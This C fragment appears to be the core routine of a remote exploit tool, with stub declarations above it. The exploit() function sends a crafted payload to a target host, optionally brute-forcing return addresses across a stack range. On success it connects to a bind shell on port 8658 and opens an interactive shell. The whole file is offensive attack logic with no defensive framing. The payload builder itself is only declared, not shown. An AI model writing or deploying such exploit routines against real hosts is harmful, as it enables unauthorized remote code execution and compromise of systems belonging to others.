
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct targets {int addr; } ;


 int EXIT_FAILURE ;
 int OPT_BRUTE ;
 int OPT_CHECK ;
 long STACK_END ;
 long STACK_START ;
 int connect_host (char*,int) ;
 int fprintf (int ,char*,...) ;
 int opt_flags ;
 int shell (int) ;
 int sleep (int) ;
 int stdout ;
 scalar_t__ steps ;
 int timeout ;
 char* xp_create (int) ;
 int xp_destroy (char*) ;
 int xp_send (char*,int,char*) ;

int exploit (char *host, int port, struct targets target) {
 char *payload;
 int thesock;
 long ret;

 if (opt_flags & OPT_BRUTE) {
  for (ret = STACK_START; ret > STACK_END; ret-=steps) {
   fprintf (stdout, "[+] Trying %#x\n", ret);
   payload = xp_create (target.addr);
   xp_send (host, port, payload);
   sleep(timeout);
   thesock = connect_host (host, 8658);
   if (thesock == -1) {
    fprintf (stdout, "[-] Exploit failed!\n");
    xp_destroy (payload);
   } else {
    fprintf (stdout, "[+] Exploit success!\n");
    fprintf (stdout, "[+] Waiting for shell\n");
    shell (thesock);
    break;
   }
  }
 } else {
  if (opt_flags & OPT_CHECK) {
   fprintf (stdout, "[+] Checking for vulnability\n");
  } else {
   fprintf (stdout, "[+] Trying %#x\n", target.addr);
  }

  payload = xp_create (target.addr);
  xp_send (host, port, payload);
  sleep(2);
  thesock = connect_host (host, 8658);
  if (thesock == -1) {
   fprintf (stdout, "[-] Exploit failed!\n");
   xp_destroy (payload);
   return EXIT_FAILURE;
  } else {
   fprintf (stdout, "[+] Exploit success!\n");
   fprintf (stdout, "[+] Waiting for shell\n");
   sleep(1);
   shell (thesock);
  }
 }
 return 0;
}
